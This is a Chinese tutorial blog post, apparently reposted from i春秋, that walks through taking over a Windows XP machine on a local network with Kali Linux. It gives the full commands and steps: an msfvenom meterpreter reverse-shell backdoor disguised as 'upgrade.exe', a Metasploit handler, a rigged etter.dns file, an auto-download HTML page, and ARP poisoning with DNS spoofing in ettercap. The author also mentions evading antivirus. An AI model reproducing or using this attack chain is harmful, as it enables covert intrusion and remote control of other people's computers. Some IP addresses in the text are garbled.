zoukankan      html  css  js  c++  java
  • kali渗透windowsXP过程

    文章来源i春秋

    这只是一个演示我自己搭建的环境,但是成功率非常高的,对方可以是其系统,首先我开启kali在打开kali终端输入nmap –sP 192.168.1.1/24 这里的ip是我的网关地址你可以输入自己的网关地址(生活中网关就是路由器地址)这段语句是扫描局域网内存活的主机如图

    更多我之前做过的案例https://bbs.ichunqiu.com/thread-23056-1-1.html
    <ignore_js_op> 
    这个被框住的IP就是我的目标192.16它8.1.117接下来输入nmap –sC 192.168.1.117这句语句的意思是探测主机类型以及其它信息(nmap非常强大,要多利用)
    <ignore_js_op> 
    当然这个目标主机我打过补丁了一些漏洞无法利用例如非常流行的MS08-067这个漏洞,好吧不水了上肉戏,接下来就要玩DNS欺骗了不过提前我们要先做个后门程序很简单用一道命令就可以msfVENOM -p  windows/meterpreter/reverse_tcp lhost=192.168.1.116 lport=4444 -f exe > /var/www/html/upgrade.exe  IP你可以换成自己的,不过可能被杀,你可以直接手动免杀一下,免杀我就不讲了
    <ignore_js_op> 
    在终端输入msfconsole启动Metasploit如图
    <ignore_js_op> 
    再依次输入以下语句
    use exploit/multi/handler
    set LHOST 192.168.1.116
    set LPORT 4444
    set payload windows/meterpreter/reverse_tcp
    show options
    exploit
    这些语句的意思是设置自己的ip和端口查看配置启动exploit然后等待程序运行我懒得一个个表明大致说一下就行,接下来就是DNS欺骗了首先找到这个路经etc/ettercap/修改这个文件etter.dns
    <ignore_js_op> 
    红框圈住的地方是我添加的我的IP地址,你们可以学着我添加不过要是自己主机的IP才可以,修改完后保存一下,然后在转到这个目录/var/www/html/修改这个文件index.html代码如下

    [AppleScript] 纯文本查看 复制代码
    01
    02
    03
    04
    05
    06
    07
    08
    09
    10
    11
    12
    13
    14
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
    <head>
    <meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
    <title>请下载进行升级浏览器</title>
    </head>
    <body>
    <script language="javascript">
    window.onload = function(){
    window.location.href="upgrade.exe";
    }
    </script>
    </body>
    </html>


    当然你可愿意自己写一些其它的,不过我一般喜欢这种,修改之后再把我们刚开始生产的后门复制到这个目录下/var/www/html/转到终端输入/etc/init.d/apache2 start启动apache2服务器(意思就是把本机当作服务器)接下来转到终端输入ettercap –G进入ettercap图形化界面
    <ignore_js_op>                                  <ignore_js_op> 
    点解unified sniffing选择网卡点确定 接下来按顺序点scan for hosts和Hosts list扫描和列出主机
    <ignore_js_op><ignore_js_op> 
    接下来我这里的网关是192.18.1.1我点击一下网关地址再点击Add to target 1然后再点击我要攻击的地址在选择Add to target 2
    <ignore_js_op> 
    接下来选择mitm中的arp poisoning选项它会弹出一个窗口你直接选择第一个点确定
    然后在选择选项跳到这个页面我们玩的是欺骗所以双击dns_spoof
    <ignore_js_op> 
    再然后我们就选择strat中的start sniffing选项开始DNS欺骗
    然后目标主机只要打开网站就会有这种情况,不管访问任何网站
    <ignore_js_op> 
    接下来对方下载文件运行一下就会启发我们的后门
    <ignore_js_op><ignore_js_op> 
                                    

    触发成功后就是这样接下来你先干什么都可以了不过前提你最好会一些dos命令你可以输入shell进入他的系统命令行状态


    我这有些乱码 好了 就这样吧 

     

  • 相关阅读:
    9.11 eventbus
    9.10,,,实现new instanceof apply call 高阶函数,偏函数,柯里化
    9.9 promise实现 写完了传到gitee上面了,这里这个不完整
    9.5cors配置代码
    9.5 jsonp 实现
    9.5 http tcp https总结
    9.3 es6 class一部分 and es5 class 发布订阅
    8.30 cookie session token jwt
    8.30vue响应式原理
    warning: LF will be replaced by CRLF in renard-wx/project.config.json. The file will have its original line endings in your working directory
  • 原文地址:https://www.cnblogs.com/ichunqiu/p/6893826.html
Copyright © 2011-2022 走看看